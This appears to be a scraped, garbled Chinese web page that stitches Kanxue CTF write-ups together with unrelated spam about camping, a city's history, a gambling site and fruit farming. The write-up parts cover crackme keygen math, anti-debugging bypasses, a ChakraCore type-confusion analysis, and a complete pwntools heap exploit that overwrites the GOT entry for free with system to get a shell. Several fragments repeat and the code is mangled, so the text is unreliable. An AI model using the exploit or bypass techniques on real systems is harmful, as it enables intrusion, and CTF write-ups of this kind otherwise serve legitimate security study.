ubeax,0C0A3C68h化简得v0-v1=02040F1Av0+v2=E2E8DB7Av0-v2=05FE0F1Av0=7473754Av1=726F6630v2=6E756630Just0for0fun11A  房车露营在欧美国家盛行已久,近年来才在中国兴起。但是如果Client-Ip和X-Forwarded-For存在值就能够保证触发漏洞了,这种漏洞主要是出现在cms中的sql注入中。,在不断发展、前进的互联网安全面前,过去的先驱成为现在的“老人”。、www.vnsr4808.com、大量机器受到影响,主要位于东欧。。 1.处理逻辑name是内置的:readyucode是输入的int__cdeclsub_40AEF0(HWNDhDlg){...GetDlgItemTextA(hDlg,1000,name,64);v1=GetDlgItemTextA(hDlg,1001,code,256);v2=v1;if(v1=0x21){if(code[0]!=0x30){v3=0;if(v1=0){LABEL_9:memset(byte_41BC84,0,sizeof(byte_41BC84));v5=off_418078[check(code,name)];MessageBoxA(hDlg,v5,v5,0);return0;}while(1){v4=code[v3];if(!isxdigit(v4)||islower(v4))break;if(++v3=v2)gotoLABEL_9;}}...}z=10000000000000000000000000000000000000000000000000000000000000000079r=code^5modzr有34字节,前17字节作为x,后17字节作为yepInput=(x,y)根据name计算3个md5值:md0=md5(\x01readyu-pediy)=51C75F1F444BAA97ED18DD6C340835D7md1=md5(\x02\x02readyu-2017)=0E5CF7F068D6EFA16F42F935EC424A75md2=md5(\x03\x03\x03readyu-crackme)=A4CD1D64486ABDE1BE441944460CD41D椭圆曲线:m=131,a=13,b=2,c=1,a2=0,a6=1前面的epInput是这个曲线上的点ep1=(51C99BFA6F18DE467C80C23B98C7994AA,42EA2D112ECEC71FCF7E000D7EFC978BD)ep2=(6C997F3E7F2C66A4A5D2FDA13756A37B1,4A38D11829D32D347BD0C0F584D546E9A)n=200000000000000004D4FDD5703A3F269校验(md2*ep1+epInput)*md0modn==(md2*ep2+epInput)*md1modnsignedint__cdeclcheck(char*code,constchar*a2){...get_mip();v29[0]=0;memset(v29[1],0,0x20u);*(_WORD*)v29[33]=0;v29[35]=0;ptr[0]=0x10;ptr[1]=0;ptr[2]=0;ptr[3]=0;ptr[4]=0;ptr[5]=0;ptr[6]=0;ptr[7]=0;ptr[8]=0;ptr[9]=0;ptr[10]=0;ptr[11]=0;ptr[12]=0;ptr[13]=0;ptr[14]=0;ptr[15]=0;ptr[16]=0;ptr[17]=0;ptr[18]=0;ptr[19]=0;ptr[20]=0;ptr[21]=0;ptr[22]=0;ptr[23]=0;ptr[24]=0;ptr[25]=0;ptr[26]=0;ptr[27]=0;ptr[28]=0;ptr[29]=0;ptr[30]=0;ptr[31]=0;ptr[32]=0;ptr[33]=0x79;mirsys_init();v2=z;a2_1=::a2;v4=::x;y=dword_41BC68;x=dword_41BC64;a6=dword_41BC70;w=dword_41BC74;bytes_to_big(34,ptr,z);cinstr(v4,code);if(mr_compare(v4,v2)=0){power(v4,5,v2,w);memset(v29,0,sizeof(v29));if(big_to_bytes(34,w,v29,1)==34){bytes_to_big(17,v29,x);bytes_to_big(17,v29[17],y);convert(0,a2_1);convert(1,a6);v17=1;if(ecurve2_init(131,13,2,1,a2_1,a6,0,0)){qmemcpy(v46,51C99BFA6F18DE467C80C23B98C7994AA,sizeof(v46));qmemcpy(v47,42EA2D112ECEC71FCF7E000D7EFC978BD,sizeof(v47));qmemcpy(v44,6C997F3E7F2C66A4A5D2FDA13756A37B1,sizeof(v44));qmemcpy(v43,4A38D11829D32D347BD0C0F584D546E9A,sizeof(v43));qmemcpy(v45,200000000000000004D4FDD5703A3F269,sizeof(v45));v30=dword_418118;v31=word_41811C;memset(v32,0,sizeof(v32));v33=0;v34=dword_4180E4;v35=byte_4180E8;memset(v36,0,sizeof(v36));v37=0;v38=0;v40=dword_4180F0;v39=dword_4180EC;memset(v41,0,sizeof(v41));a1=0;memset(v49,0,sizeof(v49));v50=0;v51=0;i=0;v6=a1;a3=(char*)mds;lpMem=(flash)v30;do{strcpy(v6,a2);strcat(v6,-);strcat(v6,(constchar*)lpMem);xmd5(v6,strlen(v6),a3,i+1);v6+=256;++i;lpMem+=4;a3+=16;}while(i3);md0=mirvar(0);md1=mirvar(0);md2=mirvar(0);x1=mirvar(0);a3a=mirvar(0);x2=mirvar(0);lpMema=mirvar(0);v9=mirvar(0);ep1=epoint_init();ep2=epoint_init();p1=epoint_init();p2=epoint_init();epInput=epoint_init();if(epoint2_set(x,y,0,epInput)){cinstr(x1,v46);cinstr(a3a,v47);epoint2_set(x1,a3a,0,ep1);cinstr(x2,v44);cinstr(lpMema,v43);epoint2_set(x2,lpMema,0,ep2);bytes_to_big(16,(_BYTE*)mds,md0);bytes_to_big(16,mds[1],md1);bytes_to_big(16,mds[2],md2);ecurve2_mult(md2,ep1,p1);ecurve2_mult(md2,ep2,p2);ecurve2_add(epInput,p1);ecurve2_add(epInput,p2);ecurve2_mult(md0,p1,p1);ecurve2_mult(md1,p2,p2);epoint2_get(p1,x1,a3a);epoint2_get(p2,x2,lpMema);cinstr(v9,v45);divide(x1,v9,v9);divide(x2,v9,v9);v17=3;if(!mr_compare(x1,x2))v17=0;}else{v17=2;}mirkill(md0);mirkill(md1);mirkill(md2);mirkill(x1);mirkill(x2);mirkill(a3a);mirkill(lpMema);mirkill(v9);epoint_free(ep1);epoint_free(ep2);epoint_free(p1);epoint_free(p2);epoint_free(epInput);}mirexit();result=v17;}else{mirexit();result=1;}}else{mirexit();result=1;}returnresult;}2.计算(md2*ep1+epInput)*md0modn==(md2*ep2+epInput)*md1modn=epInput=(md2*md1*ep2-md2*md0*ep1)*(((md0-md1)^-1)modn)得到(02D23461BA71B50AF182DC76E5A7C726F5,07BE013AF19BD185BCD20BB341EA31298B)voidtest2(){biga2=mirvar(0);biga6=mirvar(1);if(ecurve2_init(131,13,2,1,a2,a6,0,0)){epoint*epInput=epoint_init();bigx=mirvar(0);bigy=mirvar(0);bigmd0=mirvar(0);bigmd1=mirvar(0);bigmd2=mirvar(0);cinstr(md0,51C75F1F444BAA97ED18DD6C340835D7);cinstr(md1,0E5CF7F068D6EFA16F42F935EC424A75);cinstr(md2,A4CD1D64486ABDE1BE441944460CD41D);epoint*p1=epoint_init();bigx1=mirvar(0);bigy1=mirvar(0);cinstr(x1,51C99BFA6F18DE467C80C23B98C7994AA);cinstr(y1,42EA2D112ECEC71FCF7E000D7EFC978BD);epoint2_set(x1,y1,0,p1);epoint*p2=epoint_init();bigx2=mirvar(0);bigy2=mirvar(0);cinstr(x2,6C997F3E7F2C66A4A5D2FDA13756A37B1);cinstr(y2,4A38D11829D32D347BD0C0F584D546E9A);epoint2_set(x2,y2,0,p2);bign=mirvar(0);cinstr(n,200000000000000004D4FDD5703A3F269);ecurve2_mult(md2,p2,p2);ecurve2_mult(md1,p2,p2);ecurve2_mult(md2,p1,p1);ecurve2_mult(md0,p1,p1);ecurve2_sub(p1,p2);bigr=mirvar(0);bigrd=mirvar(0);bignd=mirvar(0);bigz=mirvar(0);subtract(md0,md1,r);xgcd(r,n,rd,nd,z);ecurve2_mult(rd,p2,epInput);epoint2_get(epInput,x,y);charsx[256];charsy[256];cotstr(x,sx);cotstr(y,sy);printf(%s,sx);printf(%s,sy);}}用RDLP计算得到code7A7102F36F3B344D666132A6FF7EF4BA05B99640BB815C9E712A72C64B6ABC582C2OD载入,输入123456,点确定半天没反应,忽然来个内存异常。,“aquario”是南美洲国家流行无线路由器的默认密码。先说一下如何过反调试,调试环境为ida和android模拟器,ida卡到不行啊,羡慕有真机的。处理逻辑encode1是base64,encode2和encode3比较简单,略过sn=encode3(sn)+encode2(sn)+encode1(sn)publicclassMainextendsac{...protectedvoidonCreate(){();...//这个不懂为什么没生效,生效的是基类那个(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassuvextendscc{...protectedvoidonCreate(BundlesavedInstanceState){(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassua{static{(enjoy);}...publicstaticnativeintcheck(uathis,Stringarg1){}}处理逻辑JNI_OnLoad中有两个校验和反调试的地方,静态分析的时候直接nop掉,安装完后再替换掉就可以正常调试了(有检测dexsignature和TracerPid什么的).text:00001F4CBLcheck_:00001F50BLcheck_threadso中的check函数.text:00001F38MOVSR3,#:00001F3CLDRR5,[R2,R3].text:00001F3ELDRR2,=(off_5E54-0x1F48).text:00001F40MOVSR0,:00001F42MOVSR3,#:00001F44ADDR2,PCoff_::00005E54off_5E54JNINativeMethodbyte_5E60,aLjavaLangStrin,check+1len(sn)=120,原始sn长度范围(x+x+x/3*4=120):11~36从结果来看原始sn长度是36,但是我后面是从11开始穷举的,浪费了大量的时间.mytext:0000313ELDRR1,[R5].mytext:00003140MOVSR3,#:00003144LDRR3,[R1,R3].mytext:00003146MOVSR2,#:00003148MOVSR1,:0000314AMOVSR0,::0000314EMOVSR6,:00003150BLj_j_strlen_:00003154STRR4,[SP,#0x50+var_4C].mytext:00003156MOVSR1,#:00003158CMPR0,#:0000315ABGTloc_:0000315CADDR4,SP,#0x50+:0000315EMOVSR2,#:00003160MOVSR0,:00003162BLj_j_memset_:00003166MOVSR1,:00003168MOVSR2,#:0000316AMOVSR0,:0000316CBLj_j_memcpy_:00003170LDRR2,[R5].mytext:00003172MOVSR3,#:00003176LDRR3,[R2,R3].mytext:00003178MOVSR1,:0000317AMOVSR2,:0000317CMOVSR0,::00003180MOVSR0,:00003182BLj_j_strlen_:00003186MOVSR1,:00003188MOVSR0,:0000318ABLcheck_snBYTEbuf[40];BYTEkey1[8];BYTEkey2[16];CopyMemory(buf,sn,36);FillMemory(buf+36,0x04,0x04);des_enc(buf,sizeof(buf),key1);(这里des_set_key在处理PC2_Table的时候与标准有偏差)CopyMemory(key2[12],buf[32],4);rc6_encrypt(buf,32,key2,sizeof(key2));(这个不常碰到,跟了一遍)memcmp(buf,expected,32)==0rc6与标准的区别:Q:0x9e3779b9L=0x61C88647L处理前和处理后都进行了byteswap32signedint__fastcallcheck_sn(constvoid*a1,size_ta2){...if(a2==36){v6=j_j_malloc(0x28u);v7=v6;if(v6){j_j_memcpy(v6,v3,v4);v7[36]=4;v7[37]=4;v7[38]=4;v7[39]=4;do{v8=g_key1[v2];v9=0;do{v17[8*v2+v9]=(v8(7-v9))1;++v9;}while(v9!=8);++v2;}while(v2!=8);des_set_key((int)v17);v10=0;do{v11=v7[v10];j_j_memcpy(dest,v7[v10],8u);v15=0;v16=0;des_1840((int)dest,(int)v15);v10+=8;j_j_memcpy(v11,v15,8u);}while(v10!=40);update_key2((int)g_key2,(int)v15);rc6_encrypt(v7,0x20u,(int)g_key2,16);v12=0;while((unsigned__int8)v7[v12]==byte_5D3D[v12]){if(++v12==32){result=1;gotoLABEL_14;}}}}result=0;...}3.穷举sn以kxuectf{开头,以}结尾这里直接按sn长度为36位来穷举了voidDes_SetKey(constcharKey[8]){staticboolK[64];staticboolKL[56];staticboolKR[56];ByteToBit(K,Key,64);Transform(K,K,PC1_Table,56);CopyMemory(KL[0],K[0],28);CopyMemory(KL[28],K[0],28);CopyMemory(KR[0],K[28],28);CopyMemory(KR[28],K[28],28);intoffset=0;for(inti=0;ii++){offset+=LOOP_Table[i];boolTmp[256];for(intn=0;nn++){if(PC2_Table[n]=28){Tmp[n]=KR[PC2_Table[n]-1-28+offset];}else{Tmp[n]=KL[PC2_Table[n]-1+offset];}}memcpy(SubKey[i],Tmp,48);}}voidtest_sn36(){constchar*charset=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789{}constchar*charset2=^_`mEJCTNKOGWRSFYVLZQAH[\\]upibejctnkogwrsfyvlzqahmdxKOGWRSFYVLuiconstchar*charset3=NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm76543210}{intsn_len=36;intindices[36];charsn[40]=BYTEkey1[8]={0xFD,0xB4,0x68,0x54,0x08,0xCD,0x56,0x4E};BYTEkey2[16]={0x65,0x48,0x32,0xEF,0xBA,0xCD,0x56,0x4E,0x0F,0x9B,0x1D,0x27,0x00,0x00,0x00,0x00};CopyMemory(sn,kxuectf{,8);strings1=encode3((PBYTE)sn,8);for(intk1=0;k164;k1++){for(intk2=0;k264;k2++){for(intk3=0;k364;k3++){BYTEexpected[32]={0x42,0xD3,0xC3,0xC2,0xF1,0x2A,0xE9,0x2D,0x66,0xC9,0x28,0x22,0x2C,0xEB,0x54,0x0E,0x94,0x07,0xE5,0x77,0x4A,0x92,0xB7,0x92,0x2E,0x5D,0xFD,0xF0,0xF3,0x54,0x9F,0xC6};BYTEbuf1[8];buf1[0]=charset3[k1];buf1[1]=charset3[k2];buf1[2]=charset3[k3];buf1[3]=charset3[63];FillMemory(buf1+4,4,0x04);des_encrypt(buf1,8,key1);CopyMemory(key2[12],buf1,4);rc6_decrypt(expected,sizeof(expected),key2);des_decrypt(expected,sizeof(expected),key1);if(memcmp(expected,_str(),8)==0){CopyMemory(sn,expected,32);sn[32]=charset3[k1];sn[33]=charset3[k2];sn[34]=charset3[k3];sn[35]=charset3[63];sn[sn_len]=0;conver_charset(sn,sn_len,indices,charset,charset3);printf(%s,sn);}}}}}kxuectf{D3crypted1sV3rylntere5tin91}。

通过上述分析,我们只需将“JPyjup3eCyJjlkV6DmSmGHQ=”base64解码再rc4解密,即是sn使用在线rc4解密并有base64编码功能的,进行解密:sn=madebyericky94528新发现的对象被添加到GC线程可以获取的全局工作表。,:0040100Dmovdword_41B034,:00401017callget_:::00401026moveax,dword_:0040102Btesteax,:0040102Djnzshortloc_:0040102FpushoffsetaYouGetIt;"Yougetit!".text:00401034callsub_:00401039addesp,:0040103Cxoreax,:0040103Eretncheck1v0!=0,v1!=0,v0!=v15*(v1-v0)+v1=0x8F503A4213*(v1-v0)+v0=0xEF503A42化简第一个等式得6*v1-5*v0=0x8F503A42,记为(1)check2v0!=0,v1!=0,v0!=v117*(v1-v0)+v1=0xF3A948837*(v1-v0)+v0=0x33A94883化简第一个等式得18*v1-17*v0=0xF3A94883,记为(2)化简(1),(2)得-2*v0=0x45B899BD,显然不成立2get_sn存在溢出,溢出修改返回地址为0x00413131,sn格式为:11112222333311Av0=0x31313131v1=0x32323232v2=0x33333333第一个验证:4*(v0-v1)+v0+v2=:004133E9subeax,0EAF917E2h第二个验证:3*(v0-v1)+v0+v2=:004135F7subeax,0E8F508C8h第三个验证:3*(v0-v1)+v0-v2=:004136D8subeax,0C0A3C68h化简得v0-v1=02040F1Av0+v2=E2E8DB7Av0-v2=05FE0F1Av0=7473754Av1=726F6630v2=6E756630Just0for0fun11A启动仪式上,贵港市委书记李新元向“970水蜜桃女主播”赠送荷花展吉祥物“和和”、“田田”,并为其进行代言授牌。。皇冠现金代理Satori家族重复使用Mirai代码,包括网络扫描器,telnet密码尝试和看门狗禁用(图4)。Arch:amd64-64-littleRELRO:PartialRELROStack:CanaryfoundNX:NXenabledPIE:PIEenabled1:newbox1~box52:deletefree完之后没有修改in_use标志,可以多次free,存在UAF,只有box2和box3可以free3:edit4:print5:guessseed=seed;srand((unignedint)seed);v=rand();if(input()==v)printseed;elseprintv;解题思路我这个解法好像有点麻烦,等结束后学习下标准解法是什么样的..leakprocessbase,leaklibcbase,overwritegot,getshelltest_####*seed=0;intmain(){seed=seed;srand(*(unsignedint*)seed);printf("%p",seed);printf("0x%x",rand());return0;}guess_####*seed=0;intmain(intargc,char**argv){intlow3=atoi(argv[1]);intr=atoi(argv[2]);unsignedintseed;unsignedinti;for(i=0;i=0xFFFFF;i++){seed=i12;seed+=low3;srand(seed);if(rand()==r){printf("0x%x",rand());return0;}}printf("end");return0;}###=Truefrompwnimport*importsyscontext(arch=amd64,kernel=amd64,os=linux)#_level=debugelf=ELF(./club)ifargs[LOCAL]:libc_path=/lib/x86_64-linux-gnu/io=process(./club)("processbase:"+hex(()[/root/Desktop/test/pediy_pwn/club]))("processlibc_base:"+hex(()[libc_path]))else:libc_path=./io=remote(,8888)libc=ELF(libc_path)defcmd_new(index,size):()(1)()(str(index))()(str(size))()returndefcmd_delete(index):()(2)()(str(index))returndefcmd_edit(index,buf):()(3)()(str(index))(buf)returndefcmd_print(index):()(4)()(str(index))data=()returndatadefcmd_guess_wrong(v):()(5)()(str(v))(Thenumberis)data=(!)[:-1]returndatadefcmd_guess_right(v):()(5)()(str(v))(Yougetasecret:)data=(!)[:-1]returndatadefcmd_quit(name):()(6)()(name)()returndefexploit():#leakprocessbasev=cmd_guess_wrong(0)p_guess=process([./guess_seed,str(0x148),v])guess_r=p_()#printguess_rseed=cmd_guess_right(int(guess_r,16))#printhex(int(v))process_base=int(seed)-("leakedprocessbase:"+hex(process_base))#(io)#input()#triggercoaleace#usebox4toeditbox2box3len2=0x1A0len3=0x1F0cmd_new(2,len2)cmd_edit(2,A*len2)cmd_new(3,len3)cmd_delete(2)cmd_delete(3)cmd_new(4,len2+len3)data=cmd_print(4)[:6]libc_main_arena_top=0x3C4B78libc_base=u64((8,\x00))-libc_main_arena_topprint(leakedlibc_base:%x%libc_base)#createafakefreechunkinsidebox2beforebox3box2_ptr=process_base+0x202110print(box2_ptr:%x%box2_ptr)buf=buf+=p64(0)+p64(len2+1)+p64(box2_ptr-0x18)+p64(box2_ptr-0x10)buf+=A*(len2-0x20)buf+=p64(len2)buf+=p64(len3)cmd_edit(4,buf)cmd_delete(3)#box2_ptr-0x18writtentobox2_ptrcmd_edit(3,/bin/sh\x00)#[box2]=got_freebuf=buf+=p64(0)buf+=p64(0)#box0buf+=p64(0)#box1buf+=p64(process_base+[free])cmd_edit(2,buf)#[got_free]=systembuf=buf+=p64(libc_base+[system])cmd_edit(2,buf)#system(/bin/sh)cmd_delete(3)()returnexploit()通过上述分析,我们只需将“JPyjup3eCyJjlkV6DmSmGHQ=”base64解码再rc4解密,即是sn使用在线rc4解密并有base64编码功能的,进行解密:sn=madebyericky945281988年12月撤县改市并更名为贵港市,1995年10月经国务院批准升格为地级市,辖桂平市、平南县、港北区、港南区、覃塘区,总面积10606平方公里,到2010年底全市总人口510万。?这里的newArr的创建操作如下//IfthesourceobjectisanArrayexoticobjectweshouldtr*newObj=ArraySpeciesCreate(obj,0,scriptContext);JavascriptArray*newArr=nullptr;//Ifthenewobjectwecreatedisanarray,rememberthatasitwillsaveustimesettingpropertiesintheobjectbelowif(JavascriptArray::Is(newObj)){newArr=JavascriptArray::FromVar(newObj);}注意虽然进行了转换,但是最后newArr却是NativeIntArray类型=0x000001E353F7C5100x000001E353F7C5100000000000000003........0x000001E353F7C5180000000600000000........0x000001E353F7C5200000000000000000........0x000001E353F7C5280000000100000002........0x000001E353F7C5300000000380000002.......\n0x000001E353F7C5388000000280000002......\n观察接下来的取值和赋值操作可以发现问题for(uint32k=0;klength;k++){if(!pArr-DirectGetItemAtFull(k,element)){continue;}selected=callBackFn-GetEntryPoint()(callBackFn,CallInfo(CallFlags_Value,4),thisArg,element,JavascriptNumber::ToVar(k,scriptContext),pArr);if(JavascriptConversion::ToBoolean(selected,scriptContext)){//Trytofastpathifthereturnobjectisanarrayif(newArr){newArr-DirectSetItemAt(i,element);}...pArr的类型为JavascriptArraynewArr的类型为JavascriptNativeIntArray这里直接从pArr中取出值放入了newArr,很明显是一个类型混淆造成这个混淆的根本原因是设置了staticget[](){returndummy;}导致返回了一个JavascriptNativeIntArray,从而与JavascriptArray造成混淆。2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。:0040100Dmovdword_41B034,:00401017callget_:::00401026moveax,dword_:0040102Btesteax,:0040102Djnzshortloc_:0040102FpushoffsetaYouGetIt;"Yougetit!".text:00401034callsub_:00401039addesp,:0040103Cxoreax,:0040103Eretncheck1v0!=0,v1!=0,v0!=v15*(v1-v0)+v1=0x8F503A4213*(v1-v0)+v0=0xEF503A42化简第一个等式得6*v1-5*v0=0x8F503A42,记为(1)check2v0!=0,v1!=0,v0!=v117*(v1-v0)+v1=0xF3A948837*(v1-v0)+v0=0x33A94883化简第一个等式得18*v1-17*v0=0xF3A94883,记为(2)化简(1),(2)得-2*v0=0x45B899BD,显然不成立2get_sn存在溢出,溢出修改返回地址为0x00413131,sn格式为:11112222333311Av0=0x31313131v1=0x32323232v2=0x33333333第一个验证:4*(v0-v1)+v0+v2=:004133E9subeax,0EAF917E2h第二个验证:3*(v0-v1)+v0+v2=:004135F7subeax,0E8F508C8h第三个验证:3*(v0-v1)+v0-v2=:004136D8subeax,0C0A3C68h化简得v0-v1=02040F1Av0+v2=E2E8DB7Av0-v2=05FE0F1Av0=7473754Av1=726F6630v2=6E756630Just0for0fun11A这道题还是比较简单,只是加了点反调试(关闭和禁用前台窗口,设置线程来禁止调试事件).分析见注释:00F520A0/$55pushebp00F520A1|.8BECmovebp,esp00F520A3|.6AFEpush-200F520A5|.684044F700push00F7444000F520AA|.68F0D6F500push00F5D6F0入口点00F520AF|.64:A100000000moveax,fs:[0]00F520B5|.50pusheax00F520B6|.83EC14subesp,1400F520B9|.A1DC65F700moveax,[0F765DC]00F520BE|.3145F8xor[ebp-8],eax00F520C1|.33C5xoreax,ebp00F520C3|.8945E4mov[ebp-1C],eax00F520C6|.53pushebx00F520C7|.56pushesi00F520C8|.57pushedi00F520C9|.50pusheax00F520CA|.8D45F0leaeax,[ebp-10]00F520CD|.64:A300000000movfs:[0],eax00F520D3|.E888FEFFFFcall00F51F60//调用反调试程序,关闭和禁用前台窗口(如被调试,前台窗口是调试器窗口)00F520D8|.3BF4cmpesi,esp00F520DA|.E8B1FCFFFFcall00F51D90[,//输出"password:",并读取输入SN00F520DF|.8BF0movesi,eax00F520E1|.3BF5cmpesi,ebp00F520E3|.C745DC54727573movdwordptr[ebp-24],7375725400F520EA|.C745E0744D6500movdwordptr[ebp-20],654D7400F520F1|.8D45DCleaeax,[ebp-24]00F520F4|.50pusheax/Arg200F520F5|.56pushesi|Arg100F520F6|.E8353E0000call00F55F30\,//strstr(SN,"TrustMe")00F520FB|.83C408addesp,800F520FE|.85C0testeax,eax00F52100|.-7507jnzshort00F5210900F52102|.8BCEmovecx,esi//SN中必须有"TrustMe",否则提示"error!"00F52104|.E887FDFFFFcall00F51E9000F52109|682438F700push00F73824/Procname="ZwSetInformationThread"00F5210E|.683C38F700push00F7383C|/FileName=""00F52113|.8B3D20D0F600movedi,[0F6D020]||00F52119|.FFD7calledi|\|.50pusheax|hModule00F5211C|.8B1D24D0F600movebx,[0F6D024]|00F52122|.FFD3callebx\|.8BF0movesi,eax00F52126|.6A00push000F52128|.6A00push000F5212A|.6A11push11//ThreadHideFromDebugger,禁止调试事件00F5212C|.FF151CD0F600call[0F6D01C][|.50pusheax00F52133|.FFD6callesi//CallZwSetInformationThread,禁止调试事件00F52135|.C745FC00000000movdwordptr[ebp-4],000F5213C|.A138D1F600moveax,[0F6D138]00F52141|.A34C8CF700mov[0F78C4C],eax00F52146|.C745FCFEFFFFFFmovdwordptr[ebp-4],-200F5214D|.E821000000call00F52173[|.A14C8CF700moveax,[0F78C4C]00F52157|.3B0540D1F600cmpeax,[0F6D140]00F5215D|.-7535jneshort00F5219400F5215F|.6A00push0;/ExitCode=000F52161|.FF1514D0F600call[0F6D014]\|.8B1D24D0F600movebx,[0F6D024]00F5216D|.8B3D20D0F600movedi,[0F6D020]00F52173|$682438F700push00F73824ASCII"ZwSetInformationThread"00F52178|.683C38F700push00F7383CUNICODE""00F5217D|.FFD7calledi00F5217F|.50pusheax00F52180|.FFD3callebx00F52182|.8BF0movesi,eax00F52184|.6A00push000F52186|.6A00push000F52188|.6A11push11//ThreadHideFromDebugger,禁止调试事件00F5218A|.FF151CD0F600call[0F6D01C][|.50pusheax00F52191|.FFD6callesi//CallZwSetInformationThread,禁止调试事件00F52193|.C3retn00F52194|E847FEFFFFcall00F51FE0//判断后8位是否为"20161018",是,则返回1表示成功00F52199|.85C0testeax,eax00F5219B|.-7432jzshort00F521CF00F5219D|.6A09push9;//注册码为"TrustMe20161018",则提示成功00F5219F|.E8FB300000call00F5529F00F521A4|.C70073756363movdwordptr[eax],6363757300F521AA|.C7400465737321movdwordptr[eax+4],2173736500F521B1|.C6400800movbyteptr[eax+8],000F521B5|.8BD0movedx,eax00F521B7|.E8D4120000call00F53490[|.50pusheax00F521BD|.E8BE170000call00F5398000F521C2|.685038F700push00F73850ASCII"pause"00F521C7|.E8E43F0000call00F561B000F521CC|.83C40Caddesp,0C00F521CF|33C0xoreax,eax00F521D1|.8B4DF0movecx,[ebp-10]00F521D4|.64:890D00000000movfs:[0],ecx00F521DB|.59popecx00F521DC|.5Fpopedi00F521DD|.5Epopesi00F521DE|.5Bpopebx00F521DF|.8B4DE4movecx,[ebp-1C]00F521E2|.33CDxorecx,ebp00F521E4|.E8B6340000call00F5569F00F521E9|.8BE5movesp,ebp00F521EB|.5Dpopebp00F521EC\.C3retn关闭,禁用窗口的反调试:00F51F60$,[ebp-4],[0F6D01C][[0F6D018][,eax00F51F7C.-修改段寄存器00F51F7FE8dbE800F51F80/.5Fpopedi00F51F81|.5Epopesi00F51F82|.5Bpopebx00F51F83|.8BE5movesp,ebp00F51F85|.5Dpopebp00F51F86\.,[0F775E0]入口点00F51F8F.-EB02jmpshort00F51F9300F51F91E8dbE800F51F9279db79chary,[0F78C60]//[ebp-4],,,[0F775E0]入口点,0FABEE9000F51FAF.-7502jneshort00F51FB300F51FB1E8dbE800F51FB279db79chary00F51FB3/FF75FCpushdwordptr[ebp-4]00F51FB6|.0315648CF700addedx,[0F78C64]00F51FBC|.FFD2calledx//SendMessageWWM_DESTROY关闭前台窗口,如果开着调试器,调试器就退出了00F51FBE|.61popad00F51FBF|.6A00push0;/Enable=FALSE00F51FC1|.FF75FCpushdwordptr[ebp-4]|hWnd,//禁用前台窗口00F51FC4|.FF1548D1F600call[0F6D148]\|.5Fpopedi00F51FCB|.5Epopesi00F51FCC|.5Bpopebx00F51FCD|.8BE5movesp,ebp00F51FCF|.5Dpopebp00F51FD0\.C3retn后8位判断:00F51FE0/$55pushebp00F51FE1|.8BECmovebp,esp00F51FE3|.83E4F8andesp,FFFFFFF8;qword(8-字节)堆栈对齐方式00F51FE6|.83EC1Csubesp,1C00F51FE9|.A1DC65F700moveax,[0F765DC]00F51FEE|.33C4xoreax,esp00F51FF0|.89442418mov[esp+18],eax00F51FF4|.8B15588CF700movedx,[0F78C58]ASCII"12345678"00F51FFA|.56pushesi00F51FFB|.C74424180F00000movdwordptr[esp+18],0F00F52003|.C74424140000000movdwordptr[esp+14],000F5200B|.803A00cmpbyteptr[edx],000F5200E|.C644240400movbyteptr[esp+4],000F52013|.-7504jneshort00F5201900F52015|.33C9xorecx,ecx00F52017|.-EB10jmpshort00F5202900F52019|8BCAmovecx,edx00F5201B|.8D7101leaesi,[ecx+1]00F5201E|.8BFFmovedi,edi00F52020|8A01/moval,[ecx]00F52022|.41|incecx00F52023|.84C0|testal,al00F52025|.-75F9\jnzshort00F5202000F52027|.2BCEsubecx,esi00F52029|51pushecx00F5202A|.52pushedx00F5202B|.8D4C240Cleaecx,[esp+0C]00F5202F|.E8BC070000call00F527F000F52034|.837C24140Fcmpdwordptr[esp+14],0F;//判断SN长度,一定要15位00F52039|.-7524jneshort00F5205F00F5203B|.A1588CF700moveax,[0F78C58]ASCII"12345678"00F52040|.83C007addeax,700F52043|.50pusheax/Arg1,//后8位转数字00F52044|.A3588CF700mov[0F78C58],eax|00F52049|.E845410000call00F56193\,//atoi00F5204E|.83C404addesp,400F52051|.3DFAA13301cmpeax,133A1FA//比较SN后8位是否为十进制2016101800F52056|.-7507jneshort00F5205F00F52058|.BE01000000movesi,1//后8位为"20161018",返回100F5205D|.-EB02jmpshort00F5206100F5205F|33F6xoresi,esi00F52061|837C241810cmpdwordptr[esp+18],1000F52066|.-720Cjbshort00F5207400F52068|.FF742404pushdwordptr[esp+4]/Arg100F5206C|.E85F440000call00F564D0\|.83C404addesp,400F52074|8B4C241Cmovecx,[esp+1C]00F52078|.8BC6moveax,esi00F5207A|.5Epopesi00F5207B|.33CCxorecx,esp00F5207D|.E81D360000call00F5569F00F52082|.8BE5movesp,ebp00F52084|.5Dpopebp00F52085\.C3retn ,会议大获成功,受到了梆梆安全、腾讯安全、爱加密、几维安全、百度安全、硬土壳、金山毒霸(猎豹旗下品牌)、乐变技术、腾讯TSRC、Wifi万能钥匙、天特信息、360公司、江民科技、博文视点、华章图书、infoQ、雷锋网等数十家公司和媒体的大力支持和赞助,会场爆满。保护声明Forcepoint客户通过Forcepoint云安全(包括高级分类引擎(ACE)作为电子邮件,Web和NGFW安全产品的一部分)得到保护,免受此威胁。”在村头果园里,合作社理事会成员冯杰给记者算了收入账:每亩产枣6000多斤,按照4元一斤的市场价,一亩产值就有2万多元。该算法由三个阶段组成:标记,复制和更新指针,如图3所示。,2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。Payload:要注入的DLL在网上搜索了一些关于DLL注入的资料,发现都没有被注入的DLL的实现,这里首先占用少量篇幅来说明DLL的实现。2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。,Payload:要注入的DLL在网上搜索了一些关于DLL注入的资料,发现都没有被注入的DLL的实现,这里首先占用少量篇幅来说明DLL的实现。 